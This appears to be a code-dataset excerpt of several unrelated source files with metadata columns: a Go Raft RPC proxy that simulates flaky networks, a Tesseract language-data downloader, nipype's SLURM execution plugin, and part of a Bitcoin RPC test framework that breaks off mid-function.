func (s *Server) DisconnectPeer(peerId int) error {
s.mu.Lock()
defer s.mu.Unlock()
if s.peerClients[peerId] != nil {
err := s.peerClients[peerId].Close()
s.peerClients[peerId] = nil
return err
}
return nil
}
// TODO: why 'args' and 'reply' as empty interface?
func (s *Server) Call(id int, serviceMethod string, args interface{}, reply interface{}) error {
s.mu.Lock()
peer := s.peerClients[id]
s.mu.Unlock()
// If this is called after shutdown (where client.Close is called), it will
// return an error.
if peer == nil {
return fmt.Errorf("call client %d after it's closed", id)
} else {
return peer.Call(serviceMethod, args, reply)
}
}
// RPCProxy is a trivial pass-thru proxy type for ConsensusModule's RPC methods.
// It's useful for:
// - Simulating a small delay in RPC transmission.
// - Avoiding running into https://github.com/golang/go/issues/19957
// - Simulating possible unreliable connections by delaying some messages
// significantly and dropping others when RAFT_UNRELIABLE_RPC is set.
type RPCProxy struct {
cm *ConsensusModule
}
// NOTE: this is just a wrapper for ConsensusModule.RequestVote.
// Add some delays or simulate flaky network by dropping the msg
func (rpp *RPCProxy) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) error {
if len(os.Getenv("RAFT_UNRELIABLE_RPC")) > 0 {
dice := rand.Intn(10)
if dice == 9 {
rpp.cm.dlog("drop RequestVote")
return fmt.Errorf("RPC failed")
} else if dice == 8 {
rpp.cm.dlog("delay RequestVote")
time.Sleep(75 * time.Millisecond)
}
} else {
time.Sleep(time.Duration(1+rand.Intn(5)) * time.Millisecond)
}
return rpp.cm.RequestVote(args, reply)
}
func (rpp *RPCProxy) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {
if len(os.Getenv("RAFT_UNRELIABLE_RPC")) > 0 {
dice := rand.Intn(10)
if dice == 9 {
rpp.cm.dlog("drop AppendEntries")
return fmt.Errorf("RPC failed")
} else if dice == 8 {
rpp.cm.dlog("delay AppendEntries")
time.Sleep(75 * time.Millisecond)
}
} else {
time.Sleep(time.Duration(1+rand.Intn(5)) * time.Millisecond)
}
return rpp.cm.AppendEntries(args, reply)
}
| [
"\"RAFT_UNRELIABLE_RPC\"",
"\"RAFT_UNRELIABLE_RPC\""
]
| []
| [
"RAFT_UNRELIABLE_RPC"
]
| [] | ["RAFT_UNRELIABLE_RPC"] | go | 1 | 0 | |
tessdata_downloader.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Downloader for tesseract language files."""
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import os
import sys
import requests
# import urllib.request
__author__ = "Zdenko Podobny <[email protected]>"
__copyright__ = "Copyright 2018 Zdenko Podobny"
__version__ = "1.2"
__license__ = "Apache license 2"
__date__ = "07/11/2018"
PROJECT_URL = 'https://api.github.com/repos/tesseract-ocr/'
REPOSITORIES = ['tessdata', 'tessdata_fast', 'tessdata_best']
PROXIES = None
def get_repo_tags(project_url, repository):
"""Get list of tags for repository."""
tags_url = '{0}{1}/tags'.format(project_url, repository)
r = requests.get(tags_url, proxies=PROXIES)
tags = dict()
for item in r.json():
tags[item['name']] = item['commit']['sha']
return tags
def get_repository_lof(project_url, repository, tag):
"""Get list of files for repository."""
if tag == "the_latest":
sha = get_sha_of_tag(repository)
else:
sha = get_sha_of_tag(repository, tag)
if not sha:
print("Unknown tag '{0}' for repository '{1}'".format(
tag, repository))
return None
tree_url = '{0}{1}/git/trees/{2}?recursive=1'.format(project_url,
repository,
sha)
tree_content = requests.get(tree_url, proxies=PROXIES).json()
if isinstance(tree_content, dict):
tree = tree_content.get('tree')
elif isinstance(tree_content, list):
tree = tree_content
else:
print('Unexpected structure {0}'.format(type(tree_content)))
return False
list_of_files = []
for item in tree:
if item['mode'] == '100644': # list only files
list_of_files.append((item['path'], item['size']))
# list_of_files.append({item['path']: (item['size'], item['sha'])})
return list_of_files
def check_if_file_exists(filename, file_size=0):
"""Check if file exists, optionally with expected size."""
if os.path.isfile(filename):
# File exists
local_size = os.stat(filename).st_size
if file_size:
if file_size == local_size:
# File with expected size exists
return True
else:
# File size is different => not exists
print('File "{0}" exists, but it size differ to github. It '
'will be overwritten.'.format(filename))
return False
else:
# File size isn't tested
return True
else:
# File doesn't exist
return False
def download_file(file_url, filename, file_size, output_dir):
"""Download file."""
req = requests.get(
file_url,
allow_redirects=True,
stream=True,
headers={"Accept": "application/vnd.github.v3.raw"},
proxies=PROXIES)
content_length = req.headers.get('Content-Length')
if content_length:
file_size = int(content_length)
block_size = 4096
kb_size = int(file_size / 1024)
dl = 0
output = os.path.join(output_dir, filename)
if check_if_file_exists(output, file_size):
answer = input("Warning: File '{0}' with expected filesize {1} "
"already exist!\nDownload again? [y/N] "
.format(output, file_size))
if answer.lower() != 'y':
print('Quitting...')
return
with open(output, "wb") as file:
for chunk in req.iter_content(chunk_size=block_size):
if chunk:
dl += len(chunk)
file.write(chunk)
done = int(20 * dl / file_size)
sys.stdout.write('\rDownloading {0:21} [{1}{2}] {3}KB'
.format(filename, '=' * done,
' ' * (20 - done),
kb_size))
sys.stdout.flush()
sys.stdout.write('\n')
download_size = os.stat(output).st_size
if file_size != download_size:
print("Warning: download was not successful! Filesize of downloaded"
" file {0} is {1}, but github filesize is {2}."
.format(filename, download_size, file_size))
else:
print("Download was successful.")
def list_of_repos():
"""List of know tesseract traineddata repositories."""
print("Available tesseract traineddata repositories are:")
for repository in REPOSITORIES:
print(' "{}"'.format(repository))
def get_list_of_tags():
"""Retrieve tags from know repositories."""
project_url = PROJECT_URL
for repository in REPOSITORIES:
tags = get_repo_tags(project_url, repository)
if tags:
print("Following tags were found for repository "
'"{0}":'.format(repository))
for tag in tags:
print(' "{}"'.format(tag))
else:
print(
'No tag was found for repository "{0}"!'.format(repository))
def get_sha_of_tag(repository, tag=None, project_url=PROJECT_URL):
"""Get sha for tag."""
sha = None
if not tag:
url = '{0}{1}/git/refs/heads/main'.format(project_url, repository)
else:
url = '{0}{1}/tags'.format(project_url, repository)
r = requests.get(url, proxies=PROXIES)
content = r.json()
if isinstance(content, dict):
sha = content['object']['sha']
elif isinstance(content, list):
for item in content:
if tag and item['name'] == tag:
sha = item['commit']['sha']
return sha
def display_repo_lof(repository, tag):
"""Retrieving list of files from repository."""
project_url = PROJECT_URL
tag_sha = None
if repository not in REPOSITORIES:
print("Unknown repository '{0}'".format(repository))
print()
list_of_repos()
return
tree_content = get_repository_lof(project_url, repository, tag)
if tree_content:
print("\nFollowing files were found for repository"
" '{0}' and tag '{1}':".format(repository, tag))
for item, size in tree_content:
print("{0}, size: {1}".format(item, size))
else:
print('\nNo file was found for repository {0} and {1}!'.format(
repository, tag_sha))
def get_lang_files(repository, tag, lang, output_dir):
"""Download language files from repository based on tag."""
if ".traineddata" in lang:
lang = lang.replace('.traineddata', '')
print('Start of getting information for download of files for '
'{0}:'.format(lang))
if tag == "the_latest":
tag_sha = get_sha_of_tag(repository)
else:
tag_sha = get_sha_of_tag(repository, tag)
if not tag_sha:
print("Unknown tag '{0}' for repository '{1}'".format(
tag, repository))
return None
print("Retrieving file(s) from repository '{0}', tagged as '{1}'"
.format(repository, tag))
tree_url = '{0}{1}/git/trees/{2}?recursive=1'.format(PROJECT_URL,
repository,
tag_sha)
tree_content = requests.get(tree_url, proxies=PROXIES).json()
if isinstance(tree_content, dict):
tree = tree_content.get('tree')
elif isinstance(tree_content, list):
tree = tree_content
else:
print('Unexpected structure {0}'.format(type(tree_content)))
return False
not_found = True
if not tree:
print('No output for url "{0}" (repository "{1}")'
.format(tree_url, repository))
return False
for item in tree:
if item['mode'] == '040000':
continue # skip directories
filename = item['path']
code = filename.split('.')[0]
if lang == code:
file_url = item.get('git_url')
if not file_url:
file_url = item.get('download_url')
if not file_url:
file_url = item.get('url')
if item.get('type') in ("dir", "tree", "submodule"):
print(
'"{}" is directory - ignoring...'.format(item['path']))
continue
if item['size'] == 0:
print(
'"{}" has 0 length - skipping...'.format(item['path']))
continue
if '/' in filename:
filename = filename.split('/')[1]
download_file(file_url, filename, item['size'], output_dir)
not_found = False
if not_found:
print('Could not find any file for "{}"'.format(lang))
def is_directory_writable(directory):
"""Check if directory exist and is writable.
Return False if it is not possible to create file there.
"""
if not os.path.exists(directory):
print('Output directory "{0}" does not exists! Please create it '
'first.'.format(directory))
return False
elif not os.path.isdir(directory):
print('"{0}" is not directory!'.format(directory))
return False
elif not os.access(directory, os.W_OK):
print('Can not write to directory "{}"!\nPlease check if you '
'have sufficient rights.'.format(directory))
return False
return True
def test_proxy_connection(test_proxies):
"""Test if proxy information is correct."""
repo_name = 'tessdata'
try:
test_r = requests.get(PROJECT_URL + repo_name, proxies=test_proxies)
except requests.exceptions.ProxyError as error:
print('Connection is refused {0}'.format(error), type(error))
return False
if test_r.json().get('name') == repo_name:
return True
return False
def get_proxy_from_file():
"""Try to import proxy info from local file."""
try:
# try to look for local_settings.py with info about proxy
from local_settings import PROXIES
if PROXIES['https'] == 'http://user:password@proxy:port':
# ignore example proxy setting
proxies = None
elif test_proxy_connection(PROXIES):
proxies = PROXIES
print("Loading Proxy information from file 'local_settings.py'...")
return proxies
except ImportError:
return None
def get_proxies(proxy_server, proxy_user):
"""Process information about proxies."""
proxies = None
proxy_template = 'http://{0}@{1}'.format(proxy_user, proxy_server)
if proxy_server and proxy_user: # prefer to use program arguments
proxies = {'http': proxy_template,
'https': proxy_template}
elif not proxies:
proxies = get_proxy_from_file()
else:
# TODO: check proxy format
# TODO: user auth format
if not proxy_server:
pass
# check for system proxy
if not proxy_user:
pass
# proxy_user
# system_proxy = urllib.request.getproxies()
if proxies and not test_proxy_connection(proxies):
return -1
return proxies
def main():
"""Main loop."""
global PROXIES
desc = "Tesseract traineddata downloader {}".format(__version__)
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"-v", "--version", action='store_true',
help="Print version info")
parser.add_argument(
"-o",
"--output_dir",
default=None,
help="""Directory to store downloaded file.\n
Default: TESSDATA_PREFIX environment variable if set,
otherwise current directory""")
parser.add_argument(
"-r",
"--repository",
type=str,
choices=REPOSITORIES,
default="tessdata_best",
help="Specify repository for download.\nDefault: 'tessdata_best'")
parser.add_argument(
"-lr",
"--list_repos",
action='store_true',
help="Display list of repositories")
parser.add_argument(
"-t",
"--tag",
type=str,
default="the_latest",
help="Specify repository tag for download.\n"
"Default: 'the_latest' (e.g. the latest commit)")
parser.add_argument(
"-lt",
"--list_tags",
action='store_true',
help="Display list of tag for know repositories")
parser.add_argument(
"-lof",
"--list_of_files",
action='store_true',
help="Display list of files for specified repository and tag "
"(e.g. argument -r and -t must be used with this argument)")
parser.add_argument(
"-l", "--lang", help="Language or data code of traineddata.")
parser.add_argument(
"-U",
"--proxy-user",
type=str,
default=None,
help="<user:password> Proxy user and password.")
parser.add_argument(
"-x",
"--proxy",
type=str,
default=None,
help="host[:port] for https. Use this proxy. If not specified "
"system proxy will be used by default.")
args = parser.parse_args()
# show help if no arguments provided
if not len(sys.argv) > 1:
parser.print_help()
if args.version:
print(desc, __date__)
print()
print("Author:", __author__)
print("Copyright:", __copyright__)
print("License:", __license__)
sys.exit(0)
if not args.output_dir and 'TESSDATA_PREFIX' in os.environ:
args.output_dir = os.environ['TESSDATA_PREFIX']
elif not args.output_dir:
args.output_dir = "."
PROXIES = get_proxies(args.proxy, args.proxy_user)
if PROXIES == -1:
print("Wrong proxy information provided!")
sys.exit(1)
if args.list_repos:
list_of_repos()
sys.exit(0)
if args.list_tags:
get_list_of_tags()
sys.exit(0)
if args.list_of_files:
display_repo_lof(args.repository, args.tag)
sys.exit(0)
if not is_directory_writable(args.output_dir):
sys.exit(0)
if args.lang:
get_lang_files(args.repository, args.tag, args.lang,
args.output_dir)
if __name__ == '__main__':
main()
| []
| []
| [
"TESSDATA_PREFIX"
]
| [] | ["TESSDATA_PREFIX"] | python | 1 | 0 | |
nipype/pipeline/plugins/slurm.py | '''
Created on Aug 2, 2013
@author: chadcumba
Parallel workflow execution with SLURM
'''
import os
import re
from time import sleep
from ... import logging
from ...interfaces.base import CommandLine
from .base import SGELikeBatchManagerBase, logger
iflogger = logging.getLogger('nipype.interface')
class SLURMPlugin(SGELikeBatchManagerBase):
'''
Execute using SLURM
The plugin_args input to run can be used to control the SLURM execution.
Currently supported options are:
- template : template to use for batch job submission
- sbatch_args: arguments to pass prepend to the sbatch call
'''
def __init__(self, **kwargs):
template = "#!/bin/bash"
self._retry_timeout = 2
self._max_tries = 2
self._template = template
self._sbatch_args = None
self._jobid_re = "Submitted batch job ([0-9]*)"
if 'plugin_args' in kwargs and kwargs['plugin_args']:
if 'retry_timeout' in kwargs['plugin_args']:
self._retry_timeout = kwargs['plugin_args']['retry_timeout']
if 'max_tries' in kwargs['plugin_args']:
self._max_tries = kwargs['plugin_args']['max_tries']
if 'jobid_re' in kwargs['plugin_args']:
self._jobid_re = kwargs['plugin_args']['jobid_re']
if 'template' in kwargs['plugin_args']:
self._template = kwargs['plugin_args']['template']
if os.path.isfile(self._template):
with open(self._template) as f:
self._template = f.read()
if 'sbatch_args' in kwargs['plugin_args']:
self._sbatch_args = kwargs['plugin_args']['sbatch_args']
self._pending = {}
super(SLURMPlugin, self).__init__(self._template, **kwargs)
def _is_pending(self, taskid):
try:
res = CommandLine(
'squeue',
args=' '.join(['-j', '%s' % taskid]),
resource_monitor=False,
terminal_output='allatonce').run()
return res.runtime.stdout.find(str(taskid)) > -1
except RuntimeError as e:
if any(ss in str(e) for ss
in ['Socket timed out', 'not available at the moment']):
# do not raise error and allow recheck
logger.warning(
"SLURM timeout encountered while checking job status,"
" treating job %d as pending", taskid
)
return True
if 'Invalid job id' not in str(e):
raise(e)
return False
def _submit_batchtask(self, scriptfile, node):
"""
This is more or less the _submit_batchtask from sge.py with flipped
variable names, different command line switches, and different output
formatting/processing
"""
cmd = CommandLine(
'sbatch',
environ=dict(os.environ),
resource_monitor=False,
terminal_output='allatonce')
path = os.path.dirname(scriptfile)
sbatch_args = ''
if self._sbatch_args:
sbatch_args = self._sbatch_args
if 'sbatch_args' in node.plugin_args:
if 'overwrite' in node.plugin_args and\
node.plugin_args['overwrite']:
sbatch_args = node.plugin_args['sbatch_args']
else:
sbatch_args += (" " + node.plugin_args['sbatch_args'])
if '-o' not in sbatch_args:
sbatch_args = '%s -o %s' % (sbatch_args,
os.path.join(path, 'slurm-%j.out'))
if '-e' not in sbatch_args:
sbatch_args = '%s -e %s' % (sbatch_args,
os.path.join(path, 'slurm-%j.out'))
if node._hierarchy:
jobname = '.'.join((dict(os.environ)['LOGNAME'], node._hierarchy,
node._id))
else:
jobname = '.'.join((dict(os.environ)['LOGNAME'], node._id))
jobnameitems = jobname.split('.')
jobnameitems.reverse()
jobname = '.'.join(jobnameitems)
cmd.inputs.args = '%s -J %s %s' % (sbatch_args, jobname, scriptfile)
oldlevel = iflogger.level
iflogger.setLevel(logging.getLevelName('CRITICAL'))
tries = 0
while True:
try:
result = cmd.run()
except Exception as e:
if tries < self._max_tries:
tries += 1
# sleep 2 seconds and try again.
sleep(self._retry_timeout)
else:
iflogger.setLevel(oldlevel)
raise RuntimeError('\n'.join(
(('Could not submit sbatch task'
' for node %s') % node._id, str(e))))
else:
break
logger.debug('Ran command ({0})'.format(cmd.cmdline))
iflogger.setLevel(oldlevel)
# retrieve taskid
lines = [line for line in result.runtime.stdout.split('\n') if line]
taskid = int(re.match(self._jobid_re, lines[-1]).groups()[0])
self._pending[taskid] = node.output_dir()
logger.debug('submitted sbatch task: %d for node %s' % (taskid,
node._id))
return taskid
| []
| []
| []
| [] | [] | python | 0 | 0 | |
test/functional/test_framework/test_framework.py | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
import argparse
import configparser
from enum import Enum
import logging
import os
import pdb
import shutil
import sys
import tempfile
import time
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .mininode import NetworkThread
from .util import (
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
get_datadir_path,
initialize_datadir,
MAX_NODES,
p2p_port,
PortSeed,
rpc_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
# Timestamp is Dec. 1st, 2019 at 00:00:00
TIMESTAMP_IN_THE_PAST = 1575158400
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
class BitcoinTestFramework():
"""Base class for a bitcoin test script.
Individual bitcoin test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.network_thread = None
self.mocktime = 0
# Wait for up to 60 seconds for the RPC server to respond
self.rpc_timeout = 60
self.supports_cli = False
self.bind_to_localhost_only = True
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = argparse.ArgumentParser(usage="%(prog)s [options]")
parser.add_argument("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave bitcoinds and test.* datadir on exit or error")
parser.add_argument("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop bitcoinds after the test execution")
parser.add_argument("--cachedir", dest="cachedir", default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs (default: %(default)s)")
parser.add_argument("--tmpdir", dest="tmpdir",
help="Root directory for datadirs")
parser.add_argument("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_argument("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_argument("--portseed", dest="port_seed", default=os.getpid(), type=int,
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_argument("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_argument("--configfile", dest="configfile", default=os.path.abspath(os.path.dirname(os.path.realpath(
__file__)) + "/../../config.ini"), help="Location of the test framework config file (default: %(default)s)")
parser.add_argument("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
parser.add_argument("--usecli", dest="usecli", default=False, action="store_true",
help="use bitcoin-cli instead of RPC for all commands")
parser.add_argument("--with-phononactivation", dest="phononactivation", default=False, action="store_true",
help="Activate phonon update on timestamp {}".format(TIMESTAMP_IN_THE_PAST))
self.add_options(parser)
self.options = parser.parse_args()
self.set_test_params()
assert hasattr(
self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
PortSeed.n = self.options.port_seed
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
self.options.bitcoind = os.getenv(
"BITCOIND", default=config["environment"]["BUILDDIR"] + '/src/bitcoind' + config["environment"]["EXEEXT"])
self.options.bitcoincli = os.getenv(
"BITCOINCLI", default=config["environment"]["BUILDDIR"] + '/src/bitcoin-cli' + config["environment"]["EXEEXT"])
os.environ['PATH'] = config['environment']['BUILDDIR'] + os.pathsep + \
config['environment']['BUILDDIR'] + os.path.sep + "qt" + os.pathsep + \
os.environ['PATH']
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
self.log.debug('Setting up network thread')
self.network_thread = NetworkThread()
self.network_thread.start()
success = TestStatus.FAILED
try:
if self.options.usecli and not self.supports_cli:
raise SkipTest(
"--usecli specified but test does not support using CLI")
self.skip_test_if_missing_module()
self.setup_chain()
self.setup_network()
self.import_deterministic_coinbase_privkeys()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: {}".format(e.message))
success = TestStatus.SKIPPED
except AssertionError:
self.log.exception("Assertion failed")
except KeyError:
self.log.exception("Key error")
except Exception:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
self.log.debug('Closing down network thread')
self.network_thread.close()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
for node in self.nodes:
node.cleanup_on_exit = False
self.log.info(
"Note: bitcoinds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up {} on exit".format(self.options.tmpdir))
cleanup_tree_on_exit = True
else:
self.log.warning(
"Not cleaning up dir {}".format(self.options.tmpdir))
cleanup_tree_on_exit = False
if success == TestStatus.PASSED:
self.log.info("Tests successful")
exit_code = TEST_EXIT_PASSED
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
exit_code = TEST_EXIT_SKIPPED
else:
self.log.error(
"Test failed. Test logging available at {}/test_framework.log".format(self.options.tmpdir))
self.log.error("Hint: Call {} '{}' to consolidate all logs".format(os.path.normpath(
os.path.dirname(os.path.realpath(__file__)) + "/../combine_logs.py"), self.options.tmpdir))
exit_code = TEST_EXIT_FAILED
logging.shutdown()
if cleanup_tree_on_exit:
shutil.rmtree(self.options.tmpdir)
sys.exit(exit_code)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def skip_test_if_missing_module(self):
"""Override this method to skip a test if a module is not compiled"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes[i], self.nodes[i + 1])
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def import_deterministic_coinbase_privkeys(self):
if self.setup_clean_chain:
return
for n in self.nodes:
try:
n.getwalletinfo()
except JSONRPCException as e:
assert str(e).startswith('Method not found')
continue
n.importprivkey(n.get_deterministic_priv_key().key)
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test
# scripts.
def add_nodes(self, num_nodes, extra_args=None,
*, rpchost=None, binary=None):
"""Instantiate TestNode objects.
Should only be called once after the nodes have been specified in
set_test_params()."""
if self.bind_to_localhost_only:
extra_confs = [["bind=127.0.0.1"]] * num_nodes
else:
extra_confs = [[]] * num_nodes
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [self.options.bitcoind] * num_nodes
assert_equal(len(extra_confs), num_nodes)
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(
i,
get_datadir_path(self.options.tmpdir, i),
host=rpchost,
rpc_port=rpc_port(i),
p2p_port=p2p_port(i),
timewait=self.rpc_timeout,
bitcoind=binary[i],
bitcoin_cli=self.options.bitcoincli,
mocktime=self.mocktime,
coverage_dir=self.options.coveragedir,
extra_conf=extra_confs[i],
extra_args=extra_args[i],
use_cli=self.options.usecli,
))
if self.options.phononactivation:
self.nodes[i].extend_default_args(
["-phononactivationtime={}".format(TIMESTAMP_IN_THE_PAST)])
def start_node(self, i, *args, **kwargs):
"""Start a bitcoind"""
node = self.nodes[i]
node.start(*args, **kwargs)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None, *args, **kwargs):
"""Start multiple bitcoinds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i], *args, **kwargs)
for node in self.nodes:
node.wait_for_rpc_connection()
except BaseException:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(
self.options.coveragedir, node.rpc)
def stop_node(self, i, expected_stderr='', wait=0):
"""Stop a bitcoind test node"""
self.nodes[i].stop_node(expected_stderr, wait=wait)
self.nodes[i].wait_until_stopped()
def stop_nodes(self, wait=0):
"""Stop multiple bitcoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node(wait=wait)
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def restart_node(self, i, extra_args=None):
"""Stop and start a test node"""
self.stop_node(i)
self.start_node(i, extra_args)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], self.nodes[2])
disconnect_nodes(self.nodes[2], self.nodes[1])
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes[1], self.nodes[2])
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
# Private helper methods. These should not be accessed by the subclass
# test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(
self.options.tmpdir + '/test_framework.log', encoding='utf-8')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this
# logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel
# was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit(
) else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as bitcoind's debug.log with microprecision (so
# log files can be concatenated and sorted)
formatter = logging.Formatter(
fmt='%(asctime)s.%(msecs)03d000Z %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("BitcoinRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(get_datadir_path(self.options.cachedir, i)):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(get_datadir_path(self.options.cachedir, i)):
shutil.rmtree(get_datadir_path(self.options.cachedir, i))
# Create cache directories, run bitcoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
self.nodes.append(TestNode(
i,
get_datadir_path(self.options.cachedir, i),
extra_conf=["bind=127.0.0.1"],
extra_args=[],
host=None,
rpc_port=rpc_port(i),
p2p_port=p2p_port(i),
timewait=self.rpc_timeout,
bitcoind=self.options.bitcoind,
bitcoin_cli=self.options.bitcoincli,
mocktime=self.mocktime,
coverage_dir=None
))
self.nodes[i].clear_default_args()
self.nodes[i].extend_default_args(["-datadir=" + datadir])
self.nodes[i].extend_default_args(["-disablewallet"])
if i > 0:
self.nodes[i].extend_default_args(
["-connect=127.0.0.1:" + str(p2p_port(0))])
if self.options.phononactivation:
self.nodes[i].extend_default_args(
["-phononactivationtime={}".format(TIMESTAMP_IN_THE_PAST)])
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# For backward compatibility of the python scripts with previous
# versions of the cache, set mocktime to Jan 1,
# 2014 + (201 * 10 * 60)
self.mocktime = 1388534400 + (201 * 10 * 60)
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generatetoaddress(
1, self.nodes[peer].get_deterministic_priv_key().address)
